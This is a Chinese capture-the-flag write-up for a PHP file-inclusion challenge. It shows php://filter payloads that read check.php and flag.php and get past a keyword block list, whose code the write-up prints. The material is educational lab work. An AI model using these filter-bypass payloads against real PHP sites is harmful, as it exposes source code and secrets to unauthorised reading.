攻防世界 file_include(江苏工匠杯)

首先分析源代码

在这里插入图片描述
题目类型为文件包含漏洞

通过GET传参获得flag

根据第3行 include(“./check.php”);

运用php伪协议

构造payload

php://filter/read=convert.base64-encode/resource=check.php

原理:利用filter协议读文件,将index.php通过base64编码后进行输出。这样做的好处就是如果不进行编码,文件包含后就不会有输出结果,而是当做php文件执行了,而通过编码后则可以读取文件源码。

没有得到我们想要的结果

在这里插入图片描述
“=convert.base64-encode“ 这个是对于编码格式的操作,将读取到的内容以Base64的格式加密,可以替换为

convert.quoted-printable-encodeconvert.iconv.<input-encoding>.<output-encoding>

除了convert转换过滤器以外,php还有String字符串过滤器、Zlib压缩过滤器,可以近似执行相关的功能,相互替

换~PHP: 可用过滤器列表 - Manual

我们优先考虑第三种格式convert.iconv.<input-encoding>.<output-encoding>

其中input-encoding、output-encoding支持的编码格式如下图所示

在这里插入图片描述
我们用最常用的UTF-8,UTF-16试一试

重新构造payload

php://filter/convert.iconv.UTF-8.UTF-16/resource=check.php

发现有收获

在这里插入图片描述

我们先分析check.php的代码

<?php
 if($_GET["filename"]) //检查输入内容
   { $preg_match_username = 'return 
preg_match("/base|be|encode|print|zlib|quoted|write|rot13|read|string/i",$_GET["filename"]);' //匹配字符串:/base|be|encode|print|zlib|quoted|write|rot13|read|string/i",$_GET["filename"]
  ; 
     if(eval($preg_match_username))  //执行匹配,如果输入含有上述字符串
     { die("do not hack!"); }  //关闭脚本,并输出"do not hack!"
   }

再把我们要查看的文件改成flag.php

得到flag

在这里插入图片描述

  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_rev1ve

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值